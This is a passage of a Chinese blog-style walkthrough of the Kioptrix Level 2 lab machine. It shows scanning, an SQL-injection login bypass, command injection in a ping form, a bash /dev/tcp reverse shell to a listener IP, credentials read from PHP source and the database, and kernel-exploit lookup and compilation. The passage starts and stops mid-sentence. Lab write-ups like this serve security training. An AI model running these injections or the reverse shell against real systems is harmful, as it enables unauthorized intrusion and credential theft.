
用本文内容而引发的账号封禁、数据丢失、法律追责或其他后果承担任何责任。如本文无意中涉及任何可被滥用的技术细节纯属客观描述现有公开机制不提供可执行方案也不承担后续责任。阅读/使用本文即表示您已完全理解并同意以上条款。如不同意请立即停止阅读。前言Kioptrix系列一些基础的东西就不再说明了建议从DC系列打起本文系列作为对DC系列的一个巩固从一个切入点拓展到多个切入点的尝试。信息搜集扫网段端口nmap -sn 10.144.71.0/24 nmap -sV -p- 10.144.71.126端口增加了好几个还是先从web端入手直接给了登录框刚开始的时候我看了一下源码有这么一句话Start of HTML when logged in as Administator感觉这里就是给了账户然后进行爆破bp里面尝试了一下不行再dirsearch扫了一下扫出来一个可以访问的但是好像是apahce的文档界面没什么用获取shell那么再回到之前的登录框尝试一下SQL注入直接就进去了Administator or 11#又是一个ping的界面执行一下相应命令是有回显的这个就是查询语句那么尝试反弹shellbash反弹能直接成功nc -lvnp 4444 ;bash -i /dev/tcp/10.144.71.177/4444 01提权进去之后还是得搞个tty要不然后面连数据库的时候没法正常输出python -c import pty;pty.spawn(/bin/bash)也有index.php访问一下?php mysql_connect(localhost, john, hiroshima) or die(mysql_error()); //print Connected to MySQLbr /; mysql_select_db(webapp); if ($_POST[uname] ! ){ $username $_POST[uname]; $password $_POST[psw]; $query SELECT * FROM users WHERE username $username AND password$password; //print $query.br; $result mysql_query($query); $row mysql_fetch_array($result); //print ID: .$row[id].br /; } ?直接给出了MySQL的登录账户和密码那还说啥了mysql -u john -phiroshima一共有三个库在mysql中有一个user表看一眼有两个root和一个john前两个拿不准那先尝试一下john那个能不能ssh或者原来的web端页面登录结果是web端登录不了然后ssh又因为版本过旧等原因被默认是禁用状态的。那么看一下数据库中还有没有别的账户密码后面在wepapp中也有一个users表看库名大概率就是web端的登录了select * from users; ---------------------------- | id | username | password | ---------------------------- | 1 | admin | 5afac8d85f | | 2 | john | 66lajGGbla | ----------------------------尝试之后确实是web端的登录账号但是admin进去之后也没啥用那看一下SUID/sbin/suexec这一个看起来好像能提权网上搜一搜有一个CVE2007的竞态条件与路径验证绕过原理suexec在验证目录路径和实际使用文件之间存在竞态条件。攻击者可以通过快速重命名目录或使用符号链接诱使suexec在非预期的目录下执行命令从而实现提权利用前提攻击者需要对 Apache 的文档根目录DocumentRoot具有写权限并能上传/运行 CGI/PHP 脚本那么看一下是否有可写权限【虽然一般大概率不可写】# 查看 Apache 主配置文件 cat /etc/httpd/conf/httpd.conf | grep -i DocumentRoot路径是var/www/html看一下权限ls -la /var/www/html有点忘了回顾一下字符位表示含义第1位d文件类型d代表这是一个目录(Directory)。如果是-则是普通文件l是链接。第2-4位rwx所有者权限r读、w写、x进入。表示文件属主这里是root可以查看目录内容、在里面创建/删除文件、以及cd进入该目录。第5-7位r-x所属组权限r读、-无权限、x进入。表示属于该目录属组的用户这里是root组可以查看和进入目录但不能在里面创建或删除文件缺少w。第8-10位r-x其他人权限r读、-无权限、x进入。表示既不是属主也不在属组里的其他用户如apache权限与属组相同。这样就能看出没有写入权限那么这个CVE就执行不了了换到内核看看Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux然后这里有个小技巧就是直接全部复制粘贴的话浏览器搜索就是靶机的通关教程然后自己想找exp就很难找所以要提纯一下Linux 2.6.9-55.EL exploit还是建议Chromesearch一下searchsploit --cve 2009-2689显示没找到那就换内核版本搜searchsploit centos 2.6.9就是我们上面那个后续就是正常的利用了编译运行的命令也给了gcc -o exp 9542.c ./exp其他端口利用MySQL之前扫端口的时候还开了3306默认的mysql那么我们可以进行相应的版本探测查看是否存在漏洞使用MSFsearch mysql version #自己找对应的 use 16 set rhosts 10.144.71.126 run但是会出现一个问题这个 MySQL 服务器的配置里不允许这个IP或任何非本地IP连接。这是 MySQL 默认的安全设置只允许 localhost127.0.0.1或明确授权的IP连接防止别人从外面随便连进来。那么这个端口就用不了哩CUPS再换一个631端口又是一个没见过的网上搜一搜CUPS 1.1 是一个基于标准的开源打印系统由苹果公司为 macOS 和其他 UNIX 类操作系统开发。它使用 Internet 打印协议 (IPP) 来管理打印机、打印请求和打印队列。CUPS 1.1 支持访问控制、验证和加密使其成为比其他协议强大且安全的打印解决方案。它提供系统 V 和 Berkeley 命令行界面、Web 界面和 C API 来管理打印机和打印任务。CUPS 1.1 还支持本地并行、串行、USB和网络打印机打印打印机可以从一台计算机共